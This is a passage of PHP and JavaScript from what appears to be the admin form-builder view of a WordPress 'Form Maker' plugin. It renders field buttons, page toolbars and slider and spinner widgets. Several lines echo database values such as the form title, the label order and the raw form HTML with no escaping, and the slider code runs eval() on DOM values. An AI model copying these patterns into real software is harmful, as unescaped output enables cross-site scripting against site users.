									var slider_value_save = document.getElementById(t + "_slider_valueform_id_temp");
									jQuery("#" + t + "_elementform_id_temp")[0].slide = null;
									jQuery(function () {
										jQuery("#" + t + "_elementform_id_temp").slider({
											range:"min",
											value:eval(slider_value),
											min:eval(slider_min_value),
											max:eval(slider_max_value),
											slide:function (event, ui) {
												slider_element_value.innerHTML = "" + ui.value;
												slider_value_save.value = "" + ui.value;
											}
										});
									});
								}
								else if (document.getElementById(t + "_typeform_id_temp").value == "type_range") {
									var spinner_value0 = document.getElementById(t + "_elementform_id_temp0").value;
									var spinner_step = document.getElementById(t + "_range_stepform_id_temp").value;
									jQuery("#" + t + "_elementform_id_temp0")[0].spin = null;
									jQuery("#" + t + "_elementform_id_temp1")[0].spin = null;
									spinner0 = jQuery("#" + t + "_elementform_id_temp0").spinner();
									spinner0.spinner("value", spinner_value0);
									jQuery("#" + t + "_elementform_id_temp0").spinner({ step:spinner_step});
									var spinner_value1 = document.getElementById(t + "_elementform_id_temp1").value;
									spinner1 = jQuery("#" + t + "_elementform_id_temp1").spinner();
									spinner1.spinner("value", spinner_value1);
									jQuery("#" + t + "_elementform_id_temp1").spinner({ step:spinner_step});
									var myu = t;
									jQuery(document).ready(function () {
										jQuery("#" + myu + "_mini_label_from").click(function () {
											if (jQuery(this).children('input').length == 0) {
												var from = "<input type='text' id='from' class='from' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\"" + jQuery(this).text() + "\">";
												jQuery(this).html(from);
												jQuery("input.from").focus();
												jQuery("input.from").blur(function () {
													var id_for_blur = document.getElementById('from').parentNode.id.split('_');
													var value = jQuery(this).val();
													jQuery("#" + id_for_blur[0] + "_mini_label_from").text(value);
												});
											}
									});
									jQuery("label#" + myu + "_mini_label_to").click(function () {
										if (jQuery(this).children('input').length == 0) {
											var to = "<input type='text' id='to' class='to' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\"" + jQuery(this).text() + "\">";
											jQuery(this).html(to);
											jQuery("input.to").focus();
											jQuery("input.to").blur(function () {
												var id_for_blur = document.getElementById('to').parentNode.id.split('_');
												var value = jQuery(this).val();
												jQuery("#" + id_for_blur[0] + "_mini_label_to").text(value);
											});
										}
									});
								});
							}
						}
					}
						
						remove_whitespace(document.getElementById('take'));
						form_view = 1;
						form_view_count = 0;
						
						for (i = 1; i <= 30; i++) {
							if (document.getElementById('form_id_tempform_view' + i)) {
								form_view_count++;
								form_view_max = i;
								tbody_img = document.createElement('div');
								tbody_img.setAttribute('id', 'form_id_tempform_view_img' + i);
								tbody_img.style.cssText = "float:right";
								tr_img = document.createElement('div');
								var img = document.createElement('img');
									img.setAttribute('src', '<?php echo WD_FMC_URL; ?>/images/minus.png?ver=<?php echo get_option("wd_form_maker_version"); ?>');
									img.setAttribute('title', 'Show or hide the page');
									img.setAttribute("class", "page_toolbar");
									img.setAttribute('id', 'show_page_img_' + i);
									img.setAttribute('onClick', 'show_or_hide("' + i + '")');
									img.setAttribute("onmouseover", 'chnage_icons_src(this,"minus")');
									img.setAttribute("onmouseout", 'chnage_icons_src(this,"minus")');
								var img_X = document.createElement("img");
									img_X.setAttribute("src", "<?php echo WD_FMC_URL; ?>/images/page_delete.png?ver=<?php echo get_option("wd_form_maker_version"); ?>");
									img_X.setAttribute('title', 'Delete the page');
									img_X.setAttribute("class", "page_toolbar");
									img_X.setAttribute("onclick", 'remove_page("' + i + '")');
									img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"page_delete")');
									img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"page_delete")');
								var img_X_all = document.createElement("img");
									img_X_all.setAttribute("src", "<?php echo WD_FMC_URL; ?>/images/page_delete_all.png?ver=<?php echo get_option("wd_form_maker_version"); ?>");
									img_X_all.setAttribute('title', 'Delete the page with fields');
									img_X_all.setAttribute("class", "page_toolbar");
									img_X_all.setAttribute("onclick", 'remove_page_all("' + i + '")');
									img_X_all.setAttribute("onmouseover", 'chnage_icons_src(this,"page_delete_all")');
									img_X_all.setAttribute("onmouseout", 'chnage_icons_src(this,"page_delete_all")');
								var img_EDIT = document.createElement("img");
									img_EDIT.setAttribute("src", "<?php echo WD_FMC_URL; ?>/images/page_edit.png?ver=<?php echo get_option("wd_form_maker_version"); ?>");
									img_EDIT.setAttribute('title', 'Edit the page');
									img_EDIT.setAttribute("class", "page_toolbar");
									img_EDIT.setAttribute("onclick", 'edit_page_break("' + i + '")');
									img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"page_edit")');
									img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"page_edit")');
								tr_img.appendChild(img);
								tr_img.appendChild(img_X);
								tr_img.appendChild(img_X_all);
								tr_img.appendChild(img_EDIT);
								tbody_img.appendChild(tr_img);
								document.getElementById('form_id_tempform_view' + i).parentNode.appendChild(tbody_img);
							}
						}
						
						if (form_view_count > 1) {
							for (i = 1; i <= form_view_max; i++) {
								if (document.getElementById('form_id_tempform_view' + i)) {
									first_form_view = i;
									break;
								}
							}
							form_view = form_view_max;
							need_enable = false;
							generate_page_nav(first_form_view);
							var img_EDIT = document.createElement("img");
								img_EDIT.setAttribute("src", "<?php echo WD_FMC_URL . '/images/edit.png?ver='.get_option("wd_form_maker_version"); ?>");
								img_EDIT.style.cssText = "margin-left:40px; cursor:pointer";
								img_EDIT.setAttribute("onclick", 'el_page_navigation()');
							var td_EDIT = document.getElementById("edit_page_navigation");
								td_EDIT.appendChild(img_EDIT);
							document.getElementById('page_navigation').appendChild(td_EDIT);
						}
						document.getElementById('araqel').value = 1;
					}
					jQuery(window).load(function () {
						formOnload();
					});
					jQuery(function() {
						jQuery('.wdform_section .wdform_column:last-child').each(function() {
							jQuery(this).parent().append(jQuery('<div></div>').addClass("wdform_column"));		
						});
							
						sortable_columns();
						if(<?php echo $row->sortable ?>==1) {
							jQuery( ".wdform_arrows" ).hide();
							all_sortable_events();
						}
						else
							jQuery('.wdform_column').sortable( "disable" );	
						  
					});
				</script>
				<?php
				} else { ?>
					<script type="text/javascript">
						jQuery(function() {
							jQuery('.wdform_section .wdform_column:last-child').each(function() {
								jQuery(this).parent().append(jQuery('<div></div>').addClass("wdform_column"));		
							});
							sortable_columns();
							all_sortable_events();
						});
					</script>
				<?php } ?>
			<input type="hidden" name="option" value="com_formmaker" />
			<input type="hidden" name="id" value="<?php echo $row->id; ?>" />
			<input type="hidden" name="cid[]" value="<?php echo $row->id; ?>" />
			<input type="hidden" id="task" name="task" value=""/>
			<input type="hidden" id="current_id" name="current_id" value="<?php echo $row->id; ?>" />
		</form>
		<?php
	}

  public function edit_old($id) {
    // header("X-XSS-Protection: 0");
    $row = $this->model->get_row_data($id);
    $themes = $this->model->get_theme_rows_data('old');
    $labels = array();
    $label_id = array();
    $label_order_original = array();
    $label_type = array();
    $label_all = explode('#****#', $row->label_order);
    $label_all = array_slice($label_all, 0, count($label_all) - 1);
    foreach ($label_all as $key => $label_each) {
      $label_id_each = explode('#**id**#', $label_each);
      array_push($label_id, $label_id_each[0]);
      $label_oder_each = explode('#**label**#', $label_id_each[1]);
      array_push($label_order_original, addslashes($label_oder_each[0]));
      array_push($label_type, $label_oder_each[1]);
    }
    $labels['id'] = '"' . implode('","', $label_id) . '"';
    $labels['label'] = '"' . implode('","', $label_order_original) . '"';
    $labels['type'] = '"' . implode('","', $label_type) . '"';

    $page_title = (($id != 0) ? 'Edit form ' . $row->title : 'Create new form');
    ?>
    <script type="text/javascript">
      var plugin_url = "<?php echo WD_FMC_URL; ?>";
    </script>
    <script src="<?php echo WD_FMC_URL . '/js/formmaker_free.js'; ?>?ver=<?php echo get_option("wd_form_maker_version"); ?>" type="text/javascript"></script>
    <script type="text/javascript">
      function submitbutton() {
        if (!document.getElementById('araqel') || (document.getElementById('araqel').value == '0')) {
          alert('Please wait while page loading.');
          return false;
        }
        tox = '';
        l_id_array = [<?php echo $labels['id']?>];
        l_label_array = [<?php echo $labels['label']?>];
        l_type_array = [<?php echo $labels['type']?>];
        l_id_removed = [];      
        for (x=0; x< l_id_array.length; x++) {
          l_id_removed[l_id_array[x]]=true;
        }
        for (t=1;t<=form_view_max;t++) {
          if (document.getElementById('form_id_tempform_view'+t)) {
            form_view_element=document.getElementById('form_id_tempform_view'+t);		
            n=form_view_element.childNodes.length-2;
            for(q=0;q<=n;q++) {
              if (form_view_element.childNodes[q].nodeType!=3) {
                if (!form_view_element.childNodes[q].id) {
                  GLOBAL_tr=form_view_element.childNodes[q];
                  for (x=0; x < GLOBAL_tr.firstChild.childNodes.length; x++) {
                    table=GLOBAL_tr.firstChild.childNodes[x];
                    tbody=table.firstChild;
                    for (y=0; y < tbody.childNodes.length; y++) {
                      is_in_old=false;
                      tr=tbody.childNodes[y];
                      l_id=tr.id;
                      l_label=document.getElementById( tr.id+'_element_labelform_id_temp').innerHTML;
                      l_label = l_label.replace(/(\r\n|\n|\r)/gm," ");
                      l_type=tr.getAttribute('type');
                      for (z = 0; z < l_id_array.length; z++) {
                        if (l_id_array[z] == l_id) {
                          if (l_type_array[z] == "type_address") {
                            if (document.getElementById(l_id + "_mini_label_street1")) {
                              l_id_removed[l_id_array[z]] = false;
                            }
                            if (document.getElementById(l_id+"_mini_label_street2")) {
                              l_id_removed[parseInt(l_id_array[z]) + 1] = false;
                            }
                            if (document.getElementById(l_id+"_mini_label_city")) {
                              l_id_removed[parseInt(l_id_array[z]) + 2] = false;	
                            }
                            if (document.getElementById(l_id+"_mini_label_state")) {
                              l_id_removed[parseInt(l_id_array[z]) + 3] = false;
                            }
                            if (document.getElementById(l_id+"_mini_label_postal")) {
                              l_id_removed[parseInt(l_id_array[z]) + 4] = false;
                            }
                            if (document.getElementById(l_id+"_mini_label_country")) {
                              l_id_removed[parseInt(l_id_array[z]) + 5] = false;	
                            }
                            z = z + 5;
                          }
                          else {
                            l_id_removed[l_id] = false;
                          }
                        }
                      }
                      if (tr.getAttribute('type')=="type_address") {
                        addr_id=parseInt(tr.id);
                        id_for_country= addr_id;
                        if(document.getElementById(id_for_country+"_mini_label_street1"))
                          tox=tox+addr_id+'#**id**#'+document.getElementById(id_for_country+"_mini_label_street1").innerHTML+'#**label**#'+tr.getAttribute('type')+'#****#';addr_id++; 
                        if(document.getElementById(id_for_country+"_mini_label_street2"))
                          tox=tox+addr_id+'#**id**#'+document.getElementById(id_for_country+"_mini_label_street2").innerHTML+'#**label**#'+tr.getAttribute('type')+'#****#';addr_id++; 
                        if(document.getElementById(id_for_country+"_mini_label_city"))
                          tox=tox+addr_id+'#**id**#'+document.getElementById(id_for_country+"_mini_label_city").innerHTML+'#**label**#'+tr.getAttribute('type')+'#****#';	addr_id++; 
                        if(document.getElementById(id_for_country+"_mini_label_state"))
                          tox=tox+addr_id+'#**id**#'+document.getElementById(id_for_country+"_mini_label_state").innerHTML+'#**label**#'+tr.getAttribute('type')+'#****#';	addr_id++;
                        if(document.getElementById(id_for_country+"_mini_label_postal"))									
                          tox=tox+addr_id+'#**id**#'+document.getElementById(id_for_country+"_mini_label_postal").innerHTML+'#**label**#'+tr.getAttribute('type')+'#****#';	addr_id++; 
                        if(document.getElementById(id_for_country+"_mini_label_country"))									
                          tox=tox+addr_id+'#**id**#'+document.getElementById(id_for_country+"_mini_label_country").innerHTML+'#**label**#'+tr.getAttribute('type')+'#****#'; 
                      }
                      else {
                        tox = tox+l_id+'#**id**#'+l_label+'#**label**#'+l_type+'#****#';
                      }
                    }
                  }
                }
              }
            }
          }	
        }
        document.getElementById('label_order_current').value = tox;
        for (x = 0; x < l_id_array.length; x++) {
          if (l_id_removed[l_id_array[x]]) {
            tox = tox + l_id_array[x] + '#**id**#' + l_label_array[x] + '#**label**#' + l_type_array[x] + '#****#';
          }
        }
        document.getElementById('label_order').value = tox;
        refresh_old();
        document.getElementById('pagination').value=document.getElementById('pages').getAttribute("type");
        document.getElementById('show_title').value=document.getElementById('pages').getAttribute("show_title");
        document.getElementById('show_numbers').value=document.getElementById('pages').getAttribute("show_numbers");
        return true;
      }

      gen = <?php echo (($id != 0) ? $row->counter : 1); ?>;

      function enable() {
        alltypes = Array('customHTML', 'text', 'checkbox', 'radio', 'time_and_date', 'select', 'file_upload', 'captcha', 'map', 'button', 'page_break', 'section_break', 'paypal', 'survey');
        for (x = 0; x < 14; x++) {
          document.getElementById('img_' + alltypes[x]).src = "<?php echo WD_FMC_URL . '/images/'; ?>" + alltypes[x] + ".png?ver=<?php echo get_option("wd_form_maker_version"); ?>";
        }
        if (document.getElementById('formMakerDiv').style.display == 'block') {
          jQuery('#formMakerDiv').slideToggle(200);
        }
        else {
          jQuery('#formMakerDiv').slideToggle(400);
        }
        
        if (document.getElementById('formMakerDiv1').style.display == 'block') {
          jQuery('#formMakerDiv1').slideToggle(200);
        }
        else {
          jQuery('#formMakerDiv1').slideToggle(400);
        }
        document.getElementById('when_edit').style.display = 'none';
      }

      function enable2() {
        alltypes = Array('customHTML', 'text', 'checkbox', 'radio', 'time_and_date', 'select', 'file_upload', 'captcha', 'map', 'button', 'page_break', 'section_break', 'paypal', 'survey');
        for (x = 0; x < 14; x++) {
          document.getElementById('img_' + alltypes[x]).src = "<?php echo WD_FMC_URL . '/images/'; ?>" + alltypes[x] + ".png?ver=<?php echo get_option("wd_form_maker_version"); ?>";
        }
        if (document.getElementById('formMakerDiv').style.display == 'block') {
          jQuery('#formMakerDiv').slideToggle(200);
        }
        else {
          jQuery('#formMakerDiv').slideToggle(400);
        }
        
        if (document.getElementById('formMakerDiv1').style.display == 'block') {
          jQuery('#formMakerDiv1').slideToggle(200);
        }
        else {
          jQuery('#formMakerDiv1').slideToggle(400);
        }
        document.getElementById('when_edit').style.display = 'block';
        if (document.getElementById('field_types').offsetWidth) {
          document.getElementById('when_edit').style.width = document.getElementById('field_types').offsetWidth + 'px';
        }
        if (document.getElementById('field_types').offsetHeight) {
          document.getElementById('when_edit').style.height = document.getElementById('field_types').offsetHeight + 'px';
        }
      }
    </script>
<div style="font-size: 14px; font-weight: bold;">
        This section allows you to add fields to your form.
        <a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-4.html">Read More in User Manual</a>
      </div>
    <form class="wrap" id="manage_form" method="post" action="admin.php?page=manage_fmc" style="width:99%;">
      <?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
	  <div class="fm-page-header">
			<!-- <div class="fm-page-title">
				<?php echo $page_title; ?>
			</div> -->
			<div style="float:left;">
				<div class="fm-logo-edit-page"></div>
				<div class="fm-title-edit-page">Form</br>Maker</div>
			</div>
			<div class="fm-page-actions">
				<button class="fm-button form-options-button medium" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'form_options_old');">
					<span></span>
					Form Options
				</button>
				<div style="height:40px; border-right: 1px solid #848484; display: inline-block; width: 5px; vertical-align: bottom; margin-right: 5px;"></div>				
				<?php if ($id) { ?>
					<button class="fm-button save-as-copy-button medium" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'save_as_copy_old');">
						<span></span>
						Save as Copy
					</button>
				<?php } ?>
				<button class="fm-button save-button small" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'save_old');">
					<span></span>
					Save
				</button>
				<button class="fm-button apply-button small" onclick="if (fm_check_required('title', 'Form title') || !submitbutton()) {return false;}; fm_set_input_value('task', 'apply_old');">
					<span></span>
					Apply
				</button>
				<button class="fm-button cancel-button small" onclick="fm_set_input_value('task', 'cancel');">
					<span></span>
					Cancel
				</button>
			</div>
			<div class="fm-clear"></div>
		</div>
		<div class="fm-theme-banner">
			<div style="float:left;">
				<span style="">Form title:&nbsp;</span>
				<input id="title" name="title" value="<?php echo $row->title; ?>"/>
			</div>
			<div style="float:right;">
				<button class="fm-button add-new-button large" onclick="enable(); Enable(); return false;">
					Add a New Field
					<span></span>
				</button>
			</div>	
		</div>	
		<div class="fm-clear"></div>
		<div id="formMakerDiv" onclick="close_window()"></div>
		<div id="formMakerDiv1" style="padding-top: 20px;" align="center">
			<table border="0" width="100%" cellpadding="0" cellspacing="0" height="100%" class="formMakerDiv1_table">
				<tr>
					<td style="padding:0px">
					<table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%">
                <tr valign="top">
                  <td width="15%" height="100%" style="border-right: dotted black 1px;" id="field_types">
                    <div id="when_edit" style="display: none;"></div>
                    <table border="0" cellpadding="0" cellspacing="3" width="100%">
                      <tr>
                        <td align="center" onClick="addRow('customHTML')" style="cursor:pointer" id="table_editor"  class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/customHTML.png'; ?>" style="margin:5px" id="img_customHTML"/>
                        </td>
                        <td align="center" onClick="addRow('text')" style="cursor:pointer" id="table_text" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/text.png'; ?>" style="margin:5px" id="img_text"/>
                        </td>
                      </tr>
                      <tr>
                        <td align="center" onClick="addRow('time_and_date')" style="cursor:pointer" id="table_time_and_date" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/time_and_date.png'; ?>" style="margin:5px" id="img_time_and_date"/>
                        </td>
                        <td align="center" onClick="addRow('select')" style="cursor:pointer" id="table_select" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/select.png'; ?>" style="margin:5px" id="img_select"/>
                        </td>
                      </tr>
                      <tr>
                        <td align="center" onClick="addRow('checkbox')" style="cursor:pointer" id="table_checkbox" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/checkbox.png'; ?>" style="margin:5px" id="img_checkbox"/>
                        </td>
                        <td align="center" onClick="addRow('radio')" style="cursor:pointer" id="table_radio" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/radio.png'; ?>" style="margin:5px" id="img_radio"/>
                        </td>
                      </tr>
                      <tr>
                        <td align="center" onClick="addRow('file_upload')" style="cursor:pointer" id="table_file_upload" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/file_upload.png'; ?>" style="margin:5px" id="img_file_upload"/>
                        </td>
                        <td align="center" onClick="addRow('captcha')" style="cursor:pointer" id="table_captcha" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/captcha.png'; ?>" style="margin:5px" id="img_captcha"/>
                        </td>
                      </tr>
                      <tr>
                        <td align="center" onClick="addRow('page_break')" style="cursor:pointer" id="table_page_break" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/page_break.png'; ?>" style="margin:5px" id="img_page_break"/>
                        </td>
                        <td align="center" onClick="addRow('section_break')" style="cursor:pointer" id="table_section_break" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/section_break.png'; ?>" style="margin:5px" id="img_section_break"/>
                        </td>
                      </tr>
                      <tr>
                        <td align="center" onClick="addRow('map')" style="cursor:pointer" id="table_map" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/map.png'; ?>" style="margin:5px" id="img_map"/>
                        </td>
                        <td align="center" onClick="addRow('paypal')" id="table_paypal" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/paypal.png'; ?>" style="margin:5px" id="img_paypal"/>
                        </td>
                      </tr>
                      <tr>
                        <td align="center" onClick="addRow('survey')" class="field_buttons" id="table_survey">
                          <img src="<?php echo WD_FMC_URL . '/images/survey.png'; ?>" style="margin:5px" id="img_survey"/>
                        </td>
                        <td align="center" onClick="addRow('button')" id="table_button" class="field_buttons">
                          <img src="<?php echo WD_FMC_URL . '/images/button.png'; ?>" style="margin:5px" id="img_button"/>
                        </td>
                    </tr>
                    </table>
                  </td>
                  <td width="35%" height="100%" align="left">
                    <div id="edit_table" style="padding:0px; overflow-y:scroll; height:575px"></div>
                  </td>
                  <td align="center" valign="top" style="background: url("<?php echo WD_FMC_URL . '/images/border2.png'; ?>") repeat-y;">&nbsp;</td>
                  <td style="padding:15px">
                    <table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%">
                      <tr>
                        <td align="right">
                          <input type="radio" value="end" name="el_pos" checked="checked" id="pos_end" onclick="Disable()"/>
                          At The End
                          <input type="radio" value="begin" name="el_pos" id="pos_begin" onclick="Disable()"/>
                          At The Beginning
                          <input type="radio" value="before" name="el_pos" id="pos_before" onclick="Enable()"/>
                          Before
                          <select style="width: 100px; margin-left: 5px;" id="sel_el_pos" disabled="disabled"></select>
						  <button class="fm-button field-save-button small" onclick="add(0, false); return false;">
							Save
							<span></span>
						</button>
						<button class="fm-button cancel-button small" onclick="close_window(); return false;">
							Cancel
							<span></span>
						</button>
                          <hr style=" margin-bottom:10px" />
                        </td>
                      </tr>
                      <tr height="100%" valign="top">
                        <td id="show_table"></td>
                      </tr>
                    </table>
                  </td>
                </tr>
              </table>
            </td>
          </tr>
        </table>
        <input type="hidden" id="old" />
        <input type="hidden" id="old_selected" />
        <input type="hidden" id="element_type" />
        <input type="hidden" id="editing_id" />
        <input type="hidden" value="<?php echo WD_FMC_URL; ?>" id="form_plugins_url" />
        <div id="main_editor" style="position: fixed; display: none; z-index: 140;">
          <?php
          if (user_can_richedit()) {
            wp_editor('', 'form_maker_editor', array('teeny' => FALSE, 'textarea_name' => 'form_maker_editor', 'media_buttons' => FALSE, 'textarea_rows' => 5));
          }
          else {
            ?>
            <textarea cols="36" rows="5" id="form_maker_editor" name="form_maker_editor" style="width: 440px; height: 350px; resize: vertical;" class="mce_editable" aria-hidden="true"></textarea>
            <?php
          }
          ?>
        </div>
      </div>
      <?php
      if (!function_exists('the_editor')) {
        ?>
        <iframe id="tinymce" style="display: none;"></iframe>
        <?php
      }
      ?>
      <br />      
      <br />
      <fieldset>
        <legend><h2 style="color: #00aeef;">Form</h2></legend>
        <table width="100%" style="margin:8px">
          <tr id="page_navigation">
            <td align="center" width="90%" id="pages" show_title="<?php echo $row->show_title; ?>" show_numbers="<?php echo $row->show_numbers; ?>" type="<?php echo $row->pagination; ?>"></td>
            <td align="left" id="edit_page_navigation"></td>
          </tr>
        </table>
        <div id="take">
          <?php
          if ($row->form) {
            echo $row->form;
          }
          else {
            ?>
            <table border="0" cellpadding="4" cellspacing="0" class="wdform_table1" style="width: 100%;">
              <tbody id="form_id_tempform_view1" class="wdform_tbody1" page_title="Untitled page" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false">
                <tr class="wdform_tr1">
                  <td class="wdform_td1" >
                    <table class="wdform_table2">
                      <tbody class="wdform_tbody2"></tbody>
                    </table>
                  </td>
                </tr>
                <tr class="wdform_footer">
					<td colspan="100" valign="top">
						<table width="100%" style="padding-right:170px">
							<tbody>
								<tr id="form_id_temppage_nav1">
								</tr>
							</tbody>
						</table>
					</td>
                </tr>
                <tbody id="form_id_tempform_view_img1" style="float: right !important;" >
                  <tr>
                    <td width="0%"></td>
                    <td align="right">
                      <img src="<?php echo WD_FMC_URL . '/images/minus.png?ver='. get_option("wd_form_maker_version").''; ?>" title="Show or hide the page" class="page_toolbar" onclick="show_or_hide('1')" onmouseover="chnage_icons_src(this,'minus')" onmouseout="chnage_icons_src(this,'minus')" id="show_page_img_1" />
                    </td>
                    <td>
                      <img src="<?php echo WD_FMC_URL . '/images/page_delete.png?ver='. get_option("wd_form_maker_version").''; ?>" title="Delete the page" class="page_toolbar" onclick="remove_page('1')" onmouseover="chnage_icons_src(this,'page_delete')" onmouseout="chnage_icons_src(this,'page_delete')" />
                    </td>
                    <td>
                      <img src="<?php echo WD_FMC_URL . '/images/page_delete_all.png?ver='. get_option("wd_form_maker_version").''; ?>" title="Delete the page with fields" class="page_toolbar" onclick="remove_page_all('1')" onmouseover="chnage_icons_src(this,'page_delete_all')" onmouseout="chnage_icons_src(this,'page_delete_all')" />
                    </td>
                    <td>
                      <img src="<?php echo WD_FMC_URL . '/images/page_edit.png?ver='. get_option("wd_form_maker_version").''; ?>" title="Edit the page" class="page_toolbar" onclick="edit_page_break('1')" onmouseover="chnage_icons_src(this,'page_edit')" onmouseout="chnage_icons_src(this,'page_edit')" />
                    </td>
                  </tr>
              </tbody>
            </table>
            <?php
          }
          ?>
        </div>
      </fieldset>
      <input type="hidden" name="form" id="form" />
      <input type="hidden" name="form_front" id="form_front" />
      <input type="hidden" name="pagination" id="pagination" />
      <input type="hidden" name="show_title" id="show_title" />
      <input type="hidden" name="show_numbers" id="show_numbers" />
      <input type="hidden" name="public_key" id="public_key" />
      <input type="hidden" name="private_key" id="private_key" />
      <input type="hidden" name="recaptcha_theme" id="recaptcha_theme" />
      <input type="hidden" id="label_order" name="label_order" value="<?php echo $row->label_order; ?>" />
      <input type="hidden" id="label_order_current" name="label_order_current" value="<?php echo $row->label_order_current; ?>" />  
      <input type="hidden" name="counter" id="counter" value="<?php echo $row->counter; ?>" />
      <input type="hidden" id="araqel" value="0" />
      <script type="text/javascript">
        form_view = 1;
        form_view_count = 1;
        form_view_max = 1;
        function formOnload() {
          // Enable maps.
          for (t = 0; t < <?php echo $row->counter;?>; t++)
            if (document.getElementById(t+"_typeform_id_temp")) {
              if (document.getElementById(t+"_typeform_id_temp").value=="type_map" || document.getElementById(t+"_typeform_id_temp").value=="type_mark_map") {
                if_gmap_init(t);
                for (q = 0; q < 20; q++) {
                  if (document.getElementById(t+"_elementform_id_temp").getAttribute("long"+q)) {
                    w_long=parseFloat(document.getElementById(t+"_elementform_id_temp").getAttribute("long"+q));
                    w_lat=parseFloat(document.getElementById(t+"_elementform_id_temp").getAttribute("lat"+q));
                    w_info=parseFloat(document.getElementById(t+"_elementform_id_temp").getAttribute("info"+q));
                    add_marker_on_map(t,q, w_long, w_lat, w_info, false);
                  }
                }
              }
              else
                if (document.getElementById(t+"_typeform_id_temp").value == "type_date") {
                  // Calendar.setup({
                      // inputField: t+"_elementform_id_temp",
                      // ifFormat: document.getElementById(t+"_buttonform_id_temp").getAttribute('format'),
                      // button: t+"_buttonform_id_temp",
                      // align: "Tl",
                      // singleClick: true,
                      // firstDay: 0
                      // });
                }
               else				
        if(document.getElementById(t+"_typeform_id_temp").value=="type_spinner")	{
            var spinner_value = jQuery("#" + t + "_elementform_id_temp").get( "aria-valuenow" );
            var spinner_min_value = document.getElementById(t+"_min_valueform_id_temp").value;
            var spinner_max_value = document.getElementById(t+"_max_valueform_id_temp").value;
              var spinner_step = document.getElementById(t+"_stepform_id_temp").value;
                
               jQuery( "#"+t+"_elementform_id_temp" ).removeClass( "ui-spinner-input" )
          .prop( "disabled", false )
          .removeAttr( "autocomplete" )
          .removeAttr( "role" )
          .removeAttr( "aria-valuemin" )
          .removeAttr( "aria-valuemax" )
          .removeAttr( "aria-valuenow" );
          
          span_ui= document.getElementById(t+"_elementform_id_temp").parentNode;
            span_ui.parentNode.appendChild(document.getElementById(t+"_elementform_id_temp"));
            span_ui.parentNode.removeChild(span_ui);
            
            jQuery("#"+t+"_elementform_id_temp")[0].spin = null;
            
            spinner = jQuery( "#"+t+"_elementform_id_temp" ).spinner();
            spinner.spinner( "value", spinner_value );
            jQuery( "#"+t+"_elementform_id_temp" ).spinner({ min: spinner_min_value});    
                    jQuery( "#"+t+"_elementform_id_temp" ).spinner({ max: spinner_max_value});
                    jQuery( "#"+t+"_elementform_id_temp" ).spinner({ step: spinner_step});
            
        }
            else
          if(document.getElementById(t+"_typeform_id_temp").value=="type_slider")	{
     
            var slider_value = document.getElementById(t+"_slider_valueform_id_temp").value;
            var slider_min_value = document.getElementById(t+"_slider_min_valueform_id_temp").value;
            var slider_max_value = document.getElementById(t+"_slider_max_valueform_id_temp").value;
            
            var slider_element_value = document.getElementById( t+"_element_valueform_id_temp" );
            var slider_value_save = document.getElementById( t+"_slider_valueform_id_temp" );
            
            document.getElementById(t+"_elementform_id_temp").innerHTML = "";
            document.getElementById(t+"_elementform_id_temp").removeAttribute( "class" );
            document.getElementById(t+"_elementform_id_temp").removeAttribute( "aria-disabled" );

             jQuery("#"+t+"_elementform_id_temp")[0].slide = null;	
          
              jQuery(function() {
            jQuery( "#"+t+"_elementform_id_temp").slider({
            range: "min",
            value: eval(slider_value),
            min: eval(slider_min_value),
            max: eval(slider_max_value),
            slide: function( event, ui ) {	
              slider_element_value.innerHTML = "" + ui.value ;
              slider_value_save.value = "" + ui.value; 

        }
      });
      
      
    });	
        
            
        }
        else
           if(document.getElementById(t+"_typeform_id_temp").value=="type_range"){
                    var spinner_value0 = jQuery("#" + t+"_elementform_id_temp0").get( "aria-valuenow" );
              var spinner_step = document.getElementById(t+"_range_stepform_id_temp").value;
                
               jQuery( "#"+t+"_elementform_id_temp0" ).removeClass( "ui-spinner-input" )
          .prop( "disabled", false )
          .removeAttr( "autocomplete" )
          .removeAttr( "role" )
          .removeAttr( "aria-valuenow" );
          
          span_ui= document.getElementById(t+"_elementform_id_temp0").parentNode;
            span_ui.parentNode.appendChild(document.getElementById(t+"_elementform_id_temp0"));
            span_ui.parentNode.removeChild(span_ui);
            
            
            jQuery("#"+t+"_elementform_id_temp0")[0].spin = null;
            jQuery("#"+t+"_elementform_id_temp1")[0].spin = null;
            
            spinner0 = jQuery( "#"+t+"_elementform_id_temp0" ).spinner();
            spinner0.spinner( "value", spinner_value0 );
                    jQuery( "#"+t+"_elementform_id_temp0" ).spinner({ step: spinner_step});
            
            
            
            var spinner_value1 = jQuery("#" + t+"_elementform_id_temp1").get( "aria-valuenow" );
                        
               jQuery( "#"+t+"_elementform_id_temp1" ).removeClass( "ui-spinner-input" )
          .prop( "disabled", false )
          .removeAttr( "autocomplete" )
          .removeAttr( "role" )
          .removeAttr( "aria-valuenow" );
          
          span_ui1= document.getElementById(t+"_elementform_id_temp1").parentNode;
            span_ui1.parentNode.appendChild(document.getElementById(t+"_elementform_id_temp1"));
